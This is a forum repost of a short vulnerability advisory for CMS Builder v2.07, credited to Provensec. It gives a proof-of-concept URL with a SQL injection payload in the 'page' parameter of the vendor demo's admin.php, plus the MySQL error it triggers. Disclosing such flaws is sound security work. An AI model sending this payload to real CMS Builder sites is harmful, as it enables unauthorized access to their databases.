Jump to content
Aerosol

CMS Builder 2.07 SQL Injection

Recommended Posts

Posted

# Affected software: CMS Builder v2.07
# Type of vulnerability: sql injection
# URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php
# Discovered by: Provensec
# Website: http://www.provensec.com

#versionv2.07
# Proof of concept

http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload


demo:->

http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y



MySQL Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'-25' at line 9

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...